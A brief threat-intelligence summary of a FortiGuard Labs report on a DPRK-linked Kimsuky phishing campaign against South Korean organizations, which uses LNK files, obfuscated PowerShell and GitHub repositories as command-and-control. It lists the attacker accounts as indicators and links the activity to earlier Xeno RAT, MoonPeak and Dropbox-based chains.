FortiGuard Labs identifies a Kimsuky campaign targeting South Korean organizations through phishing-delivered LNK files that abuse GitHub as command-and-control infrastructure. The LNK files display decoy PDFs while running obfuscated PowerShell that performs anti-analysis checks, creates scheduled-task persistence, collects host data, and exfiltrates logs to attacker-controlled GitHub repositories. The same repositories are used to host commands and additional modules, with hardcoded access tokens and accounts such as motoralis, God0808RAMA, Pigresy80, entire73, pandora0009, and brandonleeodd93-blip cited as infrastructure. The excerpt connects the activity to earlier GitHub-based Xeno RAT and MoonPeak reporting and notes a related AhnLab-observed Kimsuky chain that uses Dropbox and ZIP fragments to deploy a Python backdoor. The operational significance is the continued DPRK-linked shift toward trusted platforms, native Windows tooling, and scheduled tasks to reduce detection and sustain access.